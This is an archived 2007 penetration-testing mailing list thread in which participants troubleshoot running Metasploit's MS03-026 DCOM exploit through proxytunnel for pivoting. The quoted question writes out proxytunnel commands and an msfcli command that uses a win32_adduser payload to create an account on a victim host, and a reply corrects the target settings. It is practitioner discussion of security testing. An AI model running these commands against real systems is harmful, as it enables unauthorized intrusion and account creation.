Penetration Testing mailing list archives
Re: Running metasploit thru proxytunnel
From: jond <x () jond com>
Date: Thu, 11 Oct 2007 08:21:55 -0400
I don't know why I didn't think of doing this before. It's so common sense. I've always hated pivoting because I've always had to manually find the exploit I needed, compile it, get it back through the targets, only to find out, it wasn't compiled right. 4 hours later.... So James, does proxytunnel/metasploit work with Alex's suggestion? If so, I need to get this going in my lab. On 10/10/07, Alexander Bondarenko <al.bondarenko () gmail com> wrote:
Hi, why do you use RHOST=localhost ? It should be proxy IP and RPORT should be proxy port not 235. Regards, Alex On Saturday 06 October 2007 15:18, James Kelly wrote:Folks I've been banging my head into my keyboard for two days now, not getting anywhere and I was hoping one of you could smack me upside the head and tell me what I've screwed up. Problem: attacker IP: 1.2.3.4 proxy IP: 2.3.4.5 proxy port 6666 victim: 3.4.5.6 victim port: 7777 Proxytunnel setup: proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777 **now the above config works fine with rdesktop when I use: proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389 and I do rdesktop localhost:666 <--I can ts to the victim box just fine. When I try to do metasploit over proxytunnel I do config: Metasploit framework2 exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure Shell" ;-) goes to RPORT 135 payload: win32_adduser first the tunnel: proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135 now metasploit msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost RPORT=235 PASS=password USER=blah When I hit the exploit I see "Sending Request..." then nothing. I can rdesktop via proxytunnel to the victim successfully but cannot login with username blah password password. Assume the victim is vulnerable to dcom. Now can anything obvious that I've screwed up? ________________________________________________________________________ ____ 01001001 01100110 01111001 01101111 01110101 01100011 01100001 01101110 01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011 01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100 01101111 01100111 01100101 01110100 01100001 01101100 01101001 01100110 01100101 0010111 ________________________________________________________________________ ____ ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Running metasploit thru proxytunnel James Kelly (Oct 06)
- Re: Running metasploit thru proxytunnel Alexander Bondarenko (Oct 10)
- Re: Running metasploit thru proxytunnel jond (Oct 11)
- Re: Running metasploit thru proxytunnel Alexander Bondarenko (Oct 10)